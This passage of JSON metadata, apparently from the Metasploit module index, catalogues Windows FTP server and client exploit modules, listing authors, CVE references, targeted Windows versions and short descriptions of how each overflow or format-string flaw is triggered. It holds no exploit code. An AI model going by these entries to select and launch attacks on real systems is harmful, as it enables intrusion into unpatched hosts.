"path": "/modules/exploits/windows/firewall/kerio_auth.rb",
"is_install_path": true,
"ref_name": "windows/firewall/kerio_auth",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/32bitftp_list_reply": {
"name": "32bit FTP Client Stack Buffer Overflow ",
"full_name": "exploit/windows/ftp/32bitftp_list_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"fancy",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in 32bit ftp client, triggered when trying to\n download a file that has an overly long filename.",
"references": [
"OSVDB-68703",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"XP Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/32bitftp_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/32bitftp_list_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/3cdaemon_ftp_user": {
"name": "3Com 3CDaemon 2.0 FTP Username Overflow",
"full_name": "exploit/windows/ftp/3cdaemon_ftp_user",
"rank": 200,
"disclosure_date": "2005-01-04",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"otr"
],
"description": "This module exploits a vulnerability in the 3Com 3CDaemon\n FTP service. This package is being distributed from the 3Com\n web site and is recommended in numerous support documents.\n This module uses the USER command to trigger the overflow.",
"references": [
"CVE-2005-0277",
"OSVDB-12810",
"OSVDB-12811",
"BID-12155"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic",
"Windows 2000 English",
"Windows XP English SP0/SP1",
"Windows NT 4.0 SP4/SP5/SP6",
"Windows 2000 Pro SP4 French",
"Windows XP English SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb",
"is_install_path": true,
"ref_name": "windows/ftp/3cdaemon_ftp_user",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/aasync_list_reply": {
"name": "AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST)",
"full_name": "exploit/windows/ftp/aasync_list_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in AASync v2.2.1.0, triggered when\n processing the response on a LIST command. During the overflow, a structured exception\n handler record gets overwritten.",
"references": [
"OSVDB-68701",
"EDB-16738",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"XP SP3 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/aasync_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/aasync_list_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/ability_server_stor": {
"name": "Ability Server 2.34 STOR Command Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/ability_server_stor",
"rank": 300,
"disclosure_date": "2004-10-22",
"type": "exploit",
"author": [
"muts",
"Dark Eagle",
"Peter Osterberg"
],
"description": "This module exploits a stack-based buffer overflow in Ability Server 2.34.\n Ability Server fails to check input size when parsing 'STOR' and 'APPE' commands,\n which leads to a stack based buffer overflow. This plugin uses the 'STOR' command.\n\n The vulnerability has been confirmed on version 2.34 and has also been reported\n in version 2.25 and 2.32. Other versions may also be affected.",
"references": [
"CVE-2004-1626",
"OSVDB-11030",
"EDB-588"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic",
"Windows XP SP2 ENG",
"Windows XP SP3 ENG"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/ability_server_stor.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ability_server_stor",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/ftp/absolute_ftp_list_bof": {
"name": "AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow",
"full_name": "exploit/windows/ftp/absolute_ftp_list_bof",
"rank": 300,
"disclosure_date": "2011-11-09",
"type": "exploit",
"author": [
"Node"
],
"description": "This module exploits VanDyke Software AbsoluteFTP by overflowing\n a filename buffer related to the LIST command.",
"references": [
"CVE-2011-5164",
"OSVDB-77105",
"EDB-18102"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb",
"is_install_path": true,
"ref_name": "windows/ftp/absolute_ftp_list_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/ayukov_nftp": {
"name": "Ayukov NFTP FTP Client Buffer Overflow",
"full_name": "exploit/windows/ftp/ayukov_nftp",
"rank": 300,
"disclosure_date": "2017-10-21",
"type": "exploit",
"author": [
"Berk Cem Goksel",
"Daniel Teixeira",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD FTP\n Client 2.0 and earlier. By responding with a long string of data for the SYST request, it\n is possible to cause a denail-of-service condition on the FTP client, or arbitrary remote\n code exeuction under the context of the user if successfully exploited.",
"references": [
"CVE-2017-15222",
"EDB-43025"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Pro SP3 English"
],
"mod_time": "2018-01-03 20:52:57 +0000",
"path": "/modules/exploits/windows/ftp/ayukov_nftp.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ayukov_nftp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/bison_ftp_bof": {
"name": "BisonWare BisonFTP Server Buffer Overflow",
"full_name": "exploit/windows/ftp/bison_ftp_bof",
"rank": 300,
"disclosure_date": "2011-08-07",
"type": "exploit",
"author": [
"localh0t",
"veerendragg <veerendragg @ SecPod>",
"Jay Turla"
],
"description": "BisonWare BisonFTP Server 3.5 is prone to an overflow condition.\n This module exploits a buffer overflow vulnerability in the said\n application.",
"references": [
"CVE-1999-1510",
"BID-49109",
"EDB-17649",
"URL-http://secpod.org/msf/bison_server_bof.rb"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Bisonware FTP Server / Windows XP SP3 EN"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/bison_ftp_bof.rb",
"is_install_path": true,
"ref_name": "windows/ftp/bison_ftp_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/cesarftp_mkd": {
"name": "Cesar FTP 0.99g MKD Command Buffer Overflow",
"full_name": "exploit/windows/ftp/cesarftp_mkd",
"rank": 200,
"disclosure_date": "2006-06-12",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.\n\n You must have valid credentials to trigger this vulnerability. Also, you\n only get one chance, so choose your target carefully.",
"references": [
"CVE-2006-2961",
"OSVDB-26364",
"BID-18586",
"URL-http://secunia.com/advisories/20574/"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows 2000 Pro SP4 English",
"Windows 2000 Pro SP4 French",
"Windows XP SP2/SP3 English",
"Windows 2003 SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/cesarftp_mkd.rb",
"is_install_path": true,
"ref_name": "windows/ftp/cesarftp_mkd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/comsnd_ftpd_fmtstr": {
"name": "ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability",
"full_name": "exploit/windows/ftp/comsnd_ftpd_fmtstr",
"rank": 400,
"disclosure_date": "2012-06-08",
"type": "exploit",
"author": [
"ChaoYi Huang <ChaoYi.Huang@connect.polyu.hk>",
"rick2600 <rick2600@corelan.be>",
"mr_me <mr_me@corelan.be>",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially\n crafted format string specifier as a username. The crafted username is sent to the server to\n overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer\n is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.\n The SEH exit function is preferred so that the administrators are not left with an unhandled\n exception message. When using the meterpreter payload, the process will never die, allowing\n for continuous exploitation.",
"references": [
"OSVDB-82798",
"EDB-19024"
],
"platform": "Windows",
"arch": "x86",
"rport": 21,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP SP3 - English",
"Windows Server 2003 - English"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb",
"is_install_path": true,
"ref_name": "windows/ftp/comsnd_ftpd_fmtstr",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/dreamftp_format": {
"name": "BolinTech Dream FTP Server 1.02 Format String",
"full_name": "exploit/windows/ftp/dreamftp_format",
"rank": 400,
"disclosure_date": "2004-03-03",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a format string overflow in the BolinTech\n Dream FTP Server version 1.02. Based on the exploit by SkyLined.",
"references": [
"CVE-2004-2074",
"OSVDB-4986",
"BID-9800",
"EDB-823"
],
"platform": "Windows",
"arch": "x86",
"rport": 21,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Dream FTP Server v1.02 Universal"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/ftp/dreamftp_format.rb",
"is_install_path": true,
"ref_name": "windows/ftp/dreamftp_format",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/easyfilesharing_pass": {
"name": "Easy File Sharing FTP Server 2.0 PASS Overflow",
"full_name": "exploit/windows/ftp/easyfilesharing_pass",
"rank": 200,
"disclosure_date": "2006-07-31",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the Easy File Sharing 2.0\n service. By sending an overly long password, an attacker can execute\n arbitrary code.",
"references": [
"CVE-2006-3952",
"OSVDB-27646",
"BID-19243"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows 2000 Pro English ALL",
"Windows XP Pro SP0/SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/easyfilesharing_pass.rb",
"is_install_path": true,
"ref_name": "windows/ftp/easyfilesharing_pass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/easyftp_cwd_fixret": {
"name": "EasyFTP Server CWD Command Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/easyftp_cwd_fixret",
"rank": 500,
"disclosure_date": "2010-02-16",
"type": "exploit",
"author": [
"Paul Makowski <my.hndl@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which\n leads to a stack based buffer overflow. EasyFTP allows anonymous access by\n default; valid credentials are typically unnecessary to exploit this vulnerability.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n This exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'.\n This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by\n 'fixing' the return address post-exploitation. See references for more information.",
"references": [
"OSVDB-62134",
"BID-38262",
"URL-http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/",
"URL-http://paulmakowski.wordpress.com/2010/04/19/metasploit-plugin-for-easyftp-server-exploit",
"URL-https://seclists.org/bugtraq/2010/Feb/202"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows Universal - v1.7.0.2",
"Windows Universal - v1.7.0.3",
"Windows Universal - v1.7.0.4",
"Windows Universal - v1.7.0.5",
"Windows Universal - v1.7.0.6",
"Windows Universal - v1.7.0.7",
"Windows Universal - v1.7.0.8",
"Windows Universal - v1.7.0.9",
"Windows Universal - v1.7.0.10",
"Windows Universal - v1.7.0.11"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb",
"is_install_path": true,
"ref_name": "windows/ftp/easyftp_cwd_fixret",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/easyftp_list_fixret": {
"name": "EasyFTP Server LIST Command Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/easyftp_list_fixret",
"rank": 500,
"disclosure_date": "2010-07-05",
"type": "exploit",
"author": [
"Karn Ganeshan <karnganeshan@gmail.com>",
"MFR",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.\n credit goes to Karn Ganeshan.\n\n NOTE: Although, this is likely to exploit the same vulnerability as the\n 'easyftp_cwd_fixret' exploit, it uses a slightly different vector.",
"references": [
"OSVDB-62134",
"EDB-14400",
"EDB-14451"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows XP SP3 - Version 2002"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/easyftp_list_fixret.rb",
"is_install_path": true,
"ref_name": "windows/ftp/easyftp_list_fixret",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/easyftp_mkd_fixret": {
"name": "EasyFTP Server MKD Command Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/easyftp_mkd_fixret",
"rank": 500,
"disclosure_date": "2010-04-04",
"type": "exploit",
"author": [
"x90c <geinblues@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which\n leads to a stack based buffer overflow.\n\n NOTE: EasyFTP allows anonymous access by default. However, in order to access the\n 'MKD' command, you must have access to an account that can create directories.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n This exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'.\n This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by\n 'fixing' the return address post-exploitation. See references for more information.",
"references": [
"OSVDB-62134",
"EDB-12044",
"EDB-14399"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows Universal - v1.7.0.2",
"Windows Universal - v1.7.0.3",
"Windows Universal - v1.7.0.4",
"Windows Universal - v1.7.0.5",
"Windows Universal - v1.7.0.6",
"Windows Universal - v1.7.0.7",
"Windows Universal - v1.7.0.8",
"Windows Universal - v1.7.0.9",
"Windows Universal - v1.7.0.10",
"Windows Universal - v1.7.0.11"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb",
"is_install_path": true,
"ref_name": "windows/ftp/easyftp_mkd_fixret",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/filecopa_list_overflow": {
"name": "FileCopa FTP Server Pre 18 Jul Version",
"full_name": "exploit/windows/ftp/filecopa_list_overflow",
"rank": 200,
"disclosure_date": "2006-07-19",
"type": "exploit",
"author": [
"Jacopo Cervini"
],
"description": "This module exploits the buffer overflow found in the LIST command\n in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch",
"references": [
"CVE-2006-3726",
"OSVDB-27389",
"BID-19065"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows 2k Server SP4 English",
"Windows XP Pro SP2 Italian"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/filecopa_list_overflow.rb",
"is_install_path": true,
"ref_name": "windows/ftp/filecopa_list_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/filewrangler_list_reply": {
"name": "FileWrangler 5.30 Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/filewrangler_list_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"nullthreat",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a buffer overflow in the FileWrangler client\n that is triggered when the client connects to a FTP server and lists\n the directory contents, containing an overly long directory name.",
"references": [
"OSVDB-94555",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/filewrangler_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/filewrangler_list_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/freefloatftp_user": {
"name": "Free Float FTP Server USER Command Buffer Overflow",
"full_name": "exploit/windows/ftp/freefloatftp_user",
"rank": 300,
"disclosure_date": "2012-06-12",
"type": "exploit",
"author": [
"D35m0nd142",
"Doug Prostko <dougtko@gmail.com>"
],
"description": "Freefloat FTP Server is prone to an overflow condition. It\n fails to properly sanitize user-supplied input resulting in a\n stack-based buffer overflow. With a specially crafted 'USER'\n command, a remote attacker can potentially have an unspecified\n impact.",
"references": [
"OSVDB-69621",
"EDB-23243"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"FreeFloat / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/freefloatftp_user.rb",
"is_install_path": true,
"ref_name": "windows/ftp/freefloatftp_user",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/freefloatftp_wbem": {
"name": "FreeFloat FTP Server Arbitrary File Upload",
"full_name": "exploit/windows/ftp/freefloatftp_wbem",
"rank": 600,
"disclosure_date": "2012-12-07",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses multiple issues in FreeFloat: 1. No credential is actually\n needed to login; 2. User's default path is in C:\\, and this cannot be changed;\n 3. User can write to anywhere on the server's file system. As a result of these\n poor implementations, a malicious user can just log in and then upload files,\n and let WMI (Management Instrumentation service) to execute the payload uploaded.",
"references": [
"OSVDB-88302",
"OSVDB-88303"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"FreeFloat"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/freefloatftp_wbem.rb",
"is_install_path": true,
"ref_name": "windows/ftp/freefloatftp_wbem",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/freeftpd_pass": {
"name": "freeFTPd PASS Command Buffer Overflow",
"full_name": "exploit/windows/ftp/freeftpd_pass",
"rank": 300,
"disclosure_date": "2013-08-20",
"type": "exploit",
"author": [
"Wireghoul",
"TecR0c <roccogiovannicalvi@gmail.com>"
],
"description": "freeFTPd 1.0.10 and below contains an overflow condition that is triggered as\n user-supplied input is not properly validated when handling a specially crafted\n PASS command. This may allow a remote attacker to cause a buffer overflow,\n resulting in a denial of service or allow the execution of arbitrary code.\n\n freeFTPd must have an account set to authorization anonymous user account.",
"references": [
"OSVDB-96517",
"EDB-27747",
"BID-61905"
],
"platform": "Windows",
"arch": "x86",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"freeFTPd 1.0.10 and below on Windows Desktop Version"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/ftp/freeftpd_pass.rb",
"is_install_path": true,
"ref_name": "windows/ftp/freeftpd_pass",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/ftp/freeftpd_user": {
"name": "freeFTPd 1.0 Username Overflow",
"full_name": "exploit/windows/ftp/freeftpd_user",
"rank": 200,
"disclosure_date": "2005-11-16",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the freeFTPd\n multi-protocol file transfer service. This flaw can only be\n exploited when logging has been enabled (non-default).",
"references": [
"CVE-2005-3683",
"OSVDB-20909",
"BID-15457"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic",
"Windows 2000 English ALL",
"Windows XP Pro SP0/SP1 English",
"Windows NT SP5/SP6a English",
"Windows 2003 Server English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/freeftpd_user.rb",
"is_install_path": true,
"ref_name": "windows/ftp/freeftpd_user",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/ftpgetter_pwd_reply": {
"name": "FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)",
"full_name": "exploit/windows/ftp/ftpgetter_pwd_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"ekse",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a buffer overflow in FTPGetter Standard v3.55.0.05 ftp client.\n When processing the response on a PWD command, a stack based buffer overflow occurs.\n This leads to arbitrary code execution when a structured exception handler gets\n overwritten.",
"references": [
"OSVDB-68638",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"XP SP3 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ftpgetter_pwd_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/ftppad_list_reply": {
"name": "FTPPad 1.2.0 Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/ftppad_list_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"corelanc0d3r"
],
"description": "This module exploits a stack buffer overflow FTPPad 1.2.0 ftp client. The overflow is\n triggered when the client connects to a FTP server which sends an overly long directory\n and filename in response to a LIST command.\n\n This will cause an access violation, and will eventually overwrite the saved extended\n instruction pointer. Payload can be found at EDX+5c and ESI+5c, so a little pivot/\n sniper was needed to make this one work.",
"references": [
"OSVDB-68714",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"XP SP3 Professional, English - shlwapi 6.00.2900.5912",
"XP SP3 Professional, German - shlwapi 6.00.2900.5912",
"XP SP3 Professional, English - shlwapi 6.00.2900.5512"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/ftppad_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ftppad_list_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/ftpshell51_pwd_reply": {
"name": "FTPShell 5.1 Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/ftpshell51_pwd_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets\n triggered when the ftp client tries to process an overly long response to a PWD\n command. This will overwrite the saved EIP and structured exception handler.",
"references": [
"OSVDB-68639",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Universal"
],
"mod_time": "2017-09-22 18:49:09 +0000",
"path": "/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ftpshell51_pwd_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/ftpshell_cli_bof": {
"name": "FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/ftpshell_cli_bof",
"rank": 300,
"disclosure_date": "2017-03-04",
"type": "exploit",
"author": [
"r4wd3r",
"Daniel Teixeira"
],
"description": "This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise\n edition) allowing remote code execution.",
"references": [
"CVE-2018-7573",
"EDB-44596"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2018-06-29 14:22:40 +0000",
"path": "/modules/exploits/windows/ftp/ftpshell_cli_bof.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ftpshell_cli_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/ftpsynch_list_reply": {
"name": "FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/ftpsynch_list_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"myne-us",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow vulnerability in FTP Synchronizer Pro\n version 4.0.73.274 The overflow gets triggered by sending an overly long filename to\n the client in response to a LIST command.\n The LIST command gets issued when doing a preview or when you have just created a new\n sync profile and allow the tool to see the differences.\n This will overwrite a structured exception handler and trigger an access violation.",
"references": [
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"XP Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/ftpsynch_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ftpsynch_list_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/gekkomgr_list_reply": {
"name": "Gekko Manager FTP Client Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/gekkomgr_list_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"nullthreat",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a buffer overflow in Gekko Manager ftp client, triggered when\n processing the response received after sending a LIST request. If this response contains\n a long filename, a buffer overflow occurs, overwriting a structured exception handler.",
"references": [
"OSVDB-68641",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"XP SP3 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/gekkomgr_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/gekkomgr_list_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/globalscapeftp_input": {
"name": "GlobalSCAPE Secure FTP Server Input Overflow",
"full_name": "exploit/windows/ftp/globalscapeftp_input",
"rank": 500,
"disclosure_date": "2005-05-01",
"type": "exploit",
"author": [
"Fairuzan Roslan <riaf@mysec.org>",
"Mati Aharoni <mati@see-security.com>"
],
"description": "This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.\n All versions prior to 3.0.3 are affected by this flaw. A valid user account (\n or anonymous access) is required for this exploit to work.",
"references": [
"CVE-2005-1415",
"OSVDB-16049",
"BID-13454",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"GlobalSCAPE Secure FTP Server <= 3.0.2 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/globalscapeftp_input.rb",
"is_install_path": true,
"ref_name": "windows/ftp/globalscapeftp_input",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/goldenftp_pass_bof": {
